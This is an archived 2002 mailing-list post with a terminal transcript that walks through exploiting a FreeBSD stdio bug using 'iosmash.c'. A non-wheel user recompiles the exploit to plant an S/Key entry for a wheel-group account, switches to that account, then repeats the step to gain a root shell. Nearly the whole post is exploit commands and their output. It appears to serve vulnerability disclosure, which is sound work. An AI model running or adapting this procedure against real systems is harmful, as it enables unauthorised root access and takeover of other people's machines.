full info on iosmash.c as non wheel user

From: John Scimone (jscimoneat_private)
Date: Tue Apr 23 2002 - 15:25:36 PDT


    from phased....
    
    I didn't think such would be necessary, but due to the high volume of emails it
    has proved so. Below is a transcript of exploiting the stdio bug on FreeBSD as
    a user not in the wheel group.
    
    Welcome to FreeBSD!
    > id
    uid=1000(d0tslash) gid=1000(d0tslash) groups=1000(d0tslash)
    >
    > grep wheel /etc/group
    wheel:*:0:root,akt0r-root,misterx
    >
    > perl -pi -e 's/root /misterx /g' iosmash.c
    > gcc -o iosmash.c iosmash
    >./iosmash
    Adding d0tslash:
    <--- HIT CTRL-C --->
    > grep 98 iosmash.c
      s/key 98 snosoft2
      98: MASS OAT ROLL TOOL AGO CAM
            "\nmisterx 0099 snosoft2        6f648e8bd0e2988a     Apr 23,2666 01:02:03\n");
    > su misterx
    s/key 98 snosoft2
    Password:MASS OAT ROLL TOOL AGO CAM
    %pwd
    /usr/home/d0tslash
    %id
    uid=1001(misterx) gid=1001(misterx) groups=1001(misterx), 0(wheel),
    1006(cvsusers)
    %cd ~
    %grep "root " iosmash.c
      decided to make a trivial exploit to easily get root :)
            "\nroot 0099 snosoft2   6f648e8bd0e2988a     Apr 23,2666 01:02:03\n");
    %gcc -o iosmash iosmash.c
    %./iosmash
    Updating misterx:
    Old key: snosoft2
    <--- HIT CTRL-C --->
    %su
    s/key 98 snosoft2
    Password:MASS OAT ROLL TOOL AGO CAM
    xes#
    



    This archive was generated by hypermail 2b30 : Wed Apr 24 2002 - 13:59:22 PDT